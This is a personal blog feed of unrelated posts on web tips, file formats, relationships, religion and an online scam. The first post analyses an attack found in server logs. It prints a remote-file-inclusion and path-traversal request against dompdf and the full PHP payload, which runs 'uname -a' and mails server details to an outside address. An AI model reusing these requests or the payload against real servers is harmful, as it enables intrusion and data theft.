Two Drifters

After installing Varnish I can see pages which are frequently accessed.

//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?

And

/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00

were lines which I found quite strange. Was someone abusing my server to convert their stuff to PDF?

I tried to go to fridela.com – it seems like a normal website, dedicated to selling food to housewives.

vero.txt is reported as dangerous by Microsoft Security Essentials.

I DO know that it's a text file, probably it's danger lies if used with the correct application. Here's the contents of vero.txt

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"";echo'" DESIGNTIMESP=16110>http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIuJHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJ1bml4b24yMDEwQGdtYWlsLmNvbSIsIlNldG9yYW4gQm9zICIuJHNhZmVtb2RlLCRib2R5LCRmbG9hdCk7"));
die("<center> ByroeNet </center>");
?>

The base64 part decodes to

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safem
ode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $f
loat = "From : vurl info <full@info.com>"; $aran = exec('uname -a;'); $web = $_S
ERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$
inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$saf
emode; mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

Actually the exploit has to be executed by DomPDF for it to work, i.e. meaning it should execute PHP code. After the exploit has been installed, a mail is sent to unixon2010@gmail.com

additional code seems to be hosted at http://www.fridela.com/slide/air.txt – it's apparently a control interface to the cracked server (maybe also injected via DomPDF).

Be careful around these. Turn off inclusion of remote URLs in your PHP.ini.

Diese Links sollen sich selber an den Inhalt der Seite anpassen:

At some point in creating a new account Interactive Brokers "Next" button won't work (on the page you declare your investment targets and net worth).

The solution is to use FireFox without Privoxy to continue with the application form.

I am not sure whether it is Privoxy or Opera blocking the application (although I suspect Privoxy blocking some JavaScripts.)

You want to use fixed positioning with CSS

If you want to make use of the simple CSS position:fixed; to display an element static to the viewport, you will run into problems with the Internet Explorer.

position:fixed is only supported since Internet Explorer 7

I tested this solution with IE 7.0.5730.13 on Windows XP. IE 6 does not support fixed positioning.

You need to enforce strict mode

Internet Explorer will default to "quirky rendering mode", if you don't add special tags to your HTML document:

<!DOCTYPE html>
<HTML>
<HEAD>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Progress Test</title>
<meta http-equiv= "X-UA-Compatible"content="IE=Edge">
<script language = "JavaScript" src="../head.min.js"></script>
[...]

Both are essential! If you try IE 9 on the page without having added the meta tag X-UA-Compatible, it will render the page in quirky mode. And in quirky mode, it will ignore your position:fixed, and render your element where you have put it in the flow of the document.

Please note: I have read that this meta tag actually is not valid for this DOCTYPE.

It still does not work? I am testing with local documents!

Internet Explorer also takes into account where the element is being served from. This solution will work, if you upload your test documents to a server and access them over the Internet. It will not work (see note below) for local files, even if you use a local webserver to serve up the files (i.e. XAMPP). Internet Explorer will render your document in quirky mode, in this case.

Note: actually it does work offline (opening a document from the harddrive) in Internet Explorer 9 after fiddling somewhat with the document. I removed a IE compatibility script (not shown above), which I had included from Google previously. Check if you have one of those, and remove it!

URL Shortening is all the rage now. Sometimes you want to give people ridiculously long URLs, which might also be subject to change.

So you want to do it with C5, don't you?

Great, you think – there's the "add external link" menu option in Concrete's sitemap. Unfortunately it does not work the way you expect it to – it just adds the link to the Navigation, but no page alias to point to the external page (i.e. http://www.synapse-redaktion.de/FaceBook won't work after adding a "FaceBook" external link).

What to do to solve this dilemma?

My suggestion is to use both: add a (hidden) page "FaceBook" which does header JavaScript forwarding to the other page, so you can give out the links to the people, and a "real external link" so you don't have to rely on JavaScript for most of your visitors.

The SiteMap will look like this:

Adding custom attributes: (Header Extra Content, Exclude from Page List, Exclude from Nav)

The page's setup:

The script is easy:

<script type="text/javascript">
<!–
window.location = "http://www.surfnext.com"
//–>
</script>

with surfnext.com being the URL you are forwarding to.

If you have the time, you might want to add a static link or icon to the page (/*comment*/ the window.location = … part to be able to edit the page!) in case some person has their JavaScript turned off.

Warum möchte man mit verschiedenen Frauen (als Mann) oder Männern (als Frau) nur Freundschaft, keine Partnerschaft?

Weil das Gehirn nicht auf die richtige Art und Weise stimuliert wird.

D.h. entweder es wird nicht genug stimuliert -

• die andere Person ist nicht attraktiv genug
• die andere Person ist nicht intelligent genug
• die andere Person kann nicht gut genug kommunizieren
• die andere Person ist vom falschen Geschlecht (für homosexuelle)

oder es werden die falschen Zentren stimuliert

• Angst / Fluchtreflex bei Personen mit Bindungsangst
• Freundschaftliches Interesse statt partnerschaftlichem Interesse

Es läuft also alles auf Stimulation der richtigen Zentren hinaus.

Die Stimulation der Zentren

Diese Zentren haben natürlich auch vorgesetzte Filter, die über mehrere Aktivierungsstadien hindurch überwunden werden müssen. So wird bei einem Unbekannten ein intimer Zungenkuss eher den Fluchtreflex aktivieren, als erotische Gefühle.

Um in einer Person romantisches Interesse an sich zu erwecken muss man eine Sequenz von aufeinander abgestimmten Schritten in präziser zeitlicher Reihenfolge ausführen.

Selbstverständlich sind initial auch Filter zu überwinden, auf die man wenig Einfluß hat. Bspw. ist es bei bindungsgestörten Personen teilweise gar nicht möglich, diese Filter zu überwinden. Das Signal wird im Gehirn "umgeroutet", da Bindung mit Zwang / Verlust des eigenen Egos gleichgesetzt wird. Es erfolgt ein Fluchtreflex, der sich auch als Agression äußern kann.

Sind diese initialen Filter überwunden, kann man mittels einer durch Trial-and-Error optimierten Sequenz immer bessere Erfolge erzielen.

Ablehnung

Daher ist es auch sinnvoll mit Ablehnung als "mißlungenes Experiment" umzugehen, aus dem man lernen kann:

• manche Faktoren kann man nicht oder nur schwer beeinflussen (eigenes Alter, Bindungsangst des Partners)
• manche anderen Faktoren kann man variieren (eigene Kleidung, Kommunikationssequenz)

Schlussendlich lohnt es sich, Experimente mit Variierung der Parameter zu wiederholen, um zu einem erfolgreichen Resultat zu kommen.

Selbstverständlich ist auch die Wahl des Partners in spe ein solcher Parameter. Partner die bekannt für Untreue in der Vergangenheit sind, werden dieses Muster in der eigenen Beziehung bspw. höchstwahrscheinlich fortsetzen. Es ist töricht sich einzubilden dass man etwas besonderes ist. Man zeigt dem Partner gegenüber vermutlich ähnliche Kommunikations- und Bindungsmuster wie die Vorgänger, und er oder sie wird ähnlich darauf reagieren.

Muster und Zeichen

Es lohnt sich die eigenen Kommunikations- und Partnerwahl-Muster zu identifizieren. Nicht umsonst kommt es immer wieder zu ähnlichen Partnerschaften und ähnlich verlaufender Beziehungsdynamik.

Der Partner muss von vornhinein bestimmte Muster zeigen damit wir uns für ihn oder sie überhaupt interessieren. Wenn diese Muster allerdings Zeichen von bestimmten schädlichen Verhaltensweisen sind – bspw. von Ablehnung / Angst vor Partnerschaft – werden wir immer wieder auf solche Problemfälle stoßen, und uns immer wieder die Zähne an ihnen ausbeißen.

Bestimmte Verhaltensweisen, Eigenschaften usw. sind Zeichen für bestimmte Charaktereigenschaften des Partners.

Beispielsweise deutet Angeberei mit eigenen Projekten und Leistungen, sowie Erniedrigung anderer oder ihrer Leistungen, auf ein sehr geringes Selbstwertgefühl hin. Ein solcher Partner kann sehr anstrengend sein.

Daher ist Freundschaft mit manchen Menschen eine bessere Lösung, von der alle mehr profitieren. Bis sie sich ändern … und der Weg für mehr frei wird.

What are .pages files?

They are files created with Pages, a part of the iWork productivity suite for Mac OS X.

How can I open them?

There is no known software which can open .pages natively on Windows or Linux.

But, there's a kind of a workaround which lets you access the content of the .pages files.

The workaround

The file is actually a .zip archive! If you have 7-zip right-click the file to extract it. If not, you may rename the file to filename.zip and extract it with your favorite ZIP application. (Windows can do it from Windows XP upwards).

The folder / files which you obtain from the .pages file contains different files and folders.

• index.xml – if you are truly desperate, the text is in here and can be extracted with a lot of patience, I guess. Also theoretically someone could write a parser for this file sometime.
• QuickLook – this folder contains preview versions of your .pages file. If it is present – sometimes it is not (if the creator of the file did not include a preview!)

What about QuickLook & the preview files?

There's two types (I know of):

• PDF files – you're lucky, it contains your .pages in a format suitable for reading and further processing
• JPG images – this is a low-resolution screenshot of the .pages file, you can still read it, but … well no copy'n'paste here.

What about Free Opener from freeopener.com?

The guys over at fileinfo.com claim that Free Opener can open .pages. Well, it's just doing the preview files thing from above. Meaning – if you only have a low-res JPEG preview image, that's all you get from Free Opener. No text, I'm sorry to say.

I like the installer – I think more installers should be built like theirs, BUT – it seems to install along with it many programs which you actually did not want in the first place, if you are not careful. Also there are rumours about it installing Adware (see WOT).

I would at this point advise against installing Free Opener to open .pages files. Use the manual method.

Are there other solutions to open .pages files?

• Google Docs is supposed to be able to open them
• Ask your friend / colleague / … to send you a PDF file, or to export to Word-readable formats (formatting may be lost with the latter option)
• Buy a Mac.

Can InDesign access .pages files?

Not on Windows to my knowledge. Tested with InDesign CS5 + Windows 7 64bit without any extensions, by trying to place a .pages file. "No filter could be found".

We are having the Information revolution at the moment. Digital information is easily copied and thus the cost of it approaches zero.

The next major step will be the easy availability of compact home-fabrication systems, which are able to produce things for the daily use.

3-D printers, sintering and such are technologies going into this direction. Maybe, maybe one day the Star Trek idea of replicators will be here, for you to enjoy.

This will allow people to be even more independent, and powerful.

Intellectual property is the only property which really can exist – as the human mind is running completely on thoughts (input <-> processing <-> output). For it to be able to be copied millionfold allows the cost of the individual unit to be low. Very low. And it should be.

In this fascinating approach to male sperm, they are shown as highly complex machines. The first part of the movie highlights some major points about sperm, i.e. the Fructose needed for them to run being ejaculated by the male organism together with the sperm.

Then suddenly the movie goes on to say, that God had to create sperm. The reason given is, the sperm don't provide direct feedback to the testicles whether "everything worked out". And how are the testicles to know what exactly to develop? Thus, someone must have engineered sperm to precisely fit with its role in a female body.

This kind of reasoning seems to have the underlying assumption that everything is already in place as a complex whole, today.

Take Ubuntu for instance. It fits precisely with your machine, although it had no way of knowing … stop! I hear you shouting. There's the human engineers, who are designing and testing Ubuntu against a wide variety of hardware.

Yes, that's true. But, just as the human body integrates many different components derived from many different other projects – for instance about 30 % of our proteins are absolutely identical with chimpanzee's proteins – Ubuntu is also based on a lot of other projects, i.e. the Linux kernel, the GNU utilities, the apt package management system from Debian, and many, many more. And these have been developed for other systems pre-dating your system. You know, those big bulky boxes with floppy drives. And now the software has evolved (has been evolved by human engineers, granted), to support the older hardware – or at least parts of it – and also more features of your new hardware.

In the same way the human body is based – this is the evolutionist approach, of course – on previous developments and environments. Where many small, "logical" steps have been taken in the course of evolutionary change. Which gradually allowed the amazing sperm of today to happen! The male body develops a new approach, which the female body over time responds to by developing an amplified answer to, which in turn again triggers the male body to develop another layer of complexity.

Do we really need a God?

Do we really need a God? What is "God" actually to believers?

God is a system of beliefs and explanations. Take the rain, for instance. For primitive societies, it is made by God, or some mythological explanation is given about heavenly creatures – mimicking human society and behaviour, and thus experience. Think of Eris, the one with the golden apple. Think of "structured heavenly societies", like angels, fallen angels, demons, St. Pete at the Pearly Gates (fulfilling a specific function), etc.

For a scientifically-minded society, the explanation may be given by some entity, water, being vaporated by some other entity, the sun's light rays, and condensing into drops in colder areas, which then start falling down on the city. (Actually it is quite majestic and magical to just think about this "simple process". Maybe listening to the appropriate music?)

But actually this is just another system of beliefs and explanations, just more elaborate, and with less (apparent) contradictions in itself. How many of you are going to see a human cell under the microscope? How many are going to really analyze the molecular structure of sugar? There simply is no possibility of checking every known "fact" in existence. Trust is necessary, trust in the explanations, models, and insights of others.

Just as in indigenous societies, the medicine men explain the world to others, and communicate with the "spirits", in western societies scientists communicate with the "spirits" of nature using their instruments.

As such both religions – or more specifically most religions' ideas of God – and science are a set of thought structures inside people's minds. Transmitted from one generation to the next.

In my opinion "God" and "Nature" are just two different names for the same processes. The more science "demystifies" nature, the more shifts from being declared as "created by God" to "being a natural process". The sperm thing is just another example of this. If we fully understand how sperm came to be the way it is, there's still some precise physical conditions and structures which nature as a whole is based on, which we can't explain as of yet, which have to be attributed to "God". The structures and explanations are transferred from one belief system to another, which has more explicit understanding, which manages to build a better mental model. If one has the desire to understand the world.

Other vantage points

A squirrel may see the building of nuclear reactors from an entirely different perspective. It does not know that they exist – as such they would just be (noisy?) objects which do not contain nuts. And are not interesting as of a consequence. The Tom-Harry-or Dick squirrel from your neighbourhood has no use for electricity. It does not know about it, it does not understand it (do we?), nor does it want to know. It simply wants to go about collecting nuts.

The squirrel has a different (less elaborate) belief system. But it does not have to have more. You probably have some beliefs about microprocessors which are not entirely accurate. Even if you design microprocessors, you are working in a model (!), which "mostly" works OK.

Everyone is a creator

OK, this article is already quite confusing. One last point to add: everyone is a magical creator of the world around us, by transforming it. Just as I write this article, there are people programming games for children out there. This is true magic from a child's point of view. This is being God.

Warnung vor Internet-Betrug!!!

Ein Herr Philip Stöfflerphilip_stoffler33@yahoo.de hat sich auf meine Anzeige wegen zwei Lexmark X543DN Druckern (die noch zu haben sind! Interessenten bitte ein Kommentar ins Blog schreiben!) gemeldet.

Zunächst mit der Anfrage, was mein letzter Preis wäre. Leicht irritiert, da ich überall Festpreise angeschrieben hatte, schrieb ich zurück:

Sehr geehrter Herr Stoffler,

vielen Dank für Ihre Anfrage.
Mein Angebot ist ein Festpreis: 170 € für einen Drucker, 300 € für beide.
Selbstabholung – Versand möglich, gg. Erstattung von Versandkosten.

Viele Grüße,
Maximilian Batz

Es kam heute von Philip Stöffler eine e-Mail zurück, die mir sehr seltsam vorkam.

Hallo,

Ich bin sehr interessiert an den Waren und bin okay mit dem Preis und bin bereit, Sie bezahlen die Zahlung wird durch Gültig Euro Bank Scheck, wenn Sie erhalten den Scheck und Sie haben die Kontrolle von Ihrer Bank eingelöst und wenn das Geld auf Ihr Bankkonto meinem Absender kommen und holen die Waren in Deutschland ist. Ich benötige folgende Angaben zu den Scheck an Sie senden

Name
Adresse
City
PLZ
Land
Telefonnummer's wie Mobile, Home-Nummer und Büro-Nummer:
Letzter Angebot …

Vielen Dank und beste Grüße

Es geht da um irgendwelche Schecks … ich wittere sofort Betrug, und will zunächst zurückschreiben dass er sich telefonisch melden soll bei Interesse, und das Geld in bar auf mein Konto eingezahlt werden soll (um auch Betrug mittels Blüten zu vermeiden. Bin halt durch diese Mail sehr paranoid gemacht worden :-)

Dann fällt mir aber auf: diese Mail ist einfach nur ein Massen-Template. D.h. er schickt das wohl jedem der sich auf die erste Mail zurückmeldet.

• Die Anrede ist "Hallo" – ohne Namen, und das nach meiner sehr höflichen "Sehr geehrter Herr Stöffler", und meinem Namen in meiner Mail
• "Die Waren" wird benutzt, statt z.B. Feedback ob er einen oder beide Drucker haben möchte. Suspekt!
• Die ganze e-Mail ist in einem Kauderwelsch-Deutsch geschrieben – was mich darauf schließen lässt, dass ein Online-Übersetzungstool benutzt worden ist.
• Der Absender faselt von "Waren in Deutschland abholen", hat jedoch einen deutschen Namen. Sehr suspekt.

Ich werde die Kommunikation mit dieser Person / Bande auf jeden Fall meiden!